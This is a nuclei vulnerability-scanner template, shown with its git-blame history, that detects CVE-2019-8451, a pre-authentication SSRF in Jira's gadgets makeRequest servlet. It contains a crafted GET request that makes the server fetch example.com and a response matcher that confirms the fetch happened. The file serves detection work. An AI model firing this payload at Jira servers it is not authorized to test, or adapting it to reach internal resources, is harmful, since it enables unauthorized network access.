nuclei-templates/cves/2019/CVE-2019-8451.yaml

id: CVE-2019-8451

info:
  name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
  author: TechbrunchFR
  severity: medium
  description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
  reference: |
    - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
    - https://jira.atlassian.com/browse/JRASERVER-69793
  tags: cve,cve2019,atlassian,jira,ssrf

requests:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
    headers:
      X-Atlassian-token: no-check
    matchers:
      - type: word
        name: ssrf-response-body
        words:
          - '<p>This domain is for use in illustrative examples in documents.'
        part: body
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-8451`
Create CVE-2019-8451.yaml # On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important # security issue reported in August 2019. # CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in # the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. # An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable # Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal # network resources. # https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in # https://twitter.com/benmontour/status/1177250393220239360 # https://twitter.com/ojensen5115/status/1176569607357730817 2020-07-06 14:52:34 +00:00
			`info:`
			`name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`author: TechbrunchFR`
Create CVE-2019-8451.yaml # On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important # security issue reported in August 2019. # CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in # the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. # An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable # Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal # network resources. # https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in # https://twitter.com/benmontour/status/1177250393220239360 # https://twitter.com/ojensen5115/status/1176569607357730817 2020-07-06 14:52:34 +00:00			`severity: medium`
Description and referenes 2021-03-30 12:10:17 +00:00			`description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.`
			`reference: \|`
			`- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in`
			`- https://jira.atlassian.com/browse/JRASERVER-69793`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2019,atlassian,jira,ssrf`
Create CVE-2019-8451.yaml # On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important # security issue reported in August 2019. # CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in # the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. # An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable # Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal # network resources. # https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in # https://twitter.com/benmontour/status/1177250393220239360 # https://twitter.com/ojensen5115/status/1176569607357730817 2020-07-06 14:52:34 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'`
			`headers:`
			`X-Atlassian-token: no-check`
			`matchers:`
			`- type: word`
			`name: ssrf-response-body`
			`words:`
			`- '<p>This domain is for use in illustrative examples in documents.'`
			`part: body`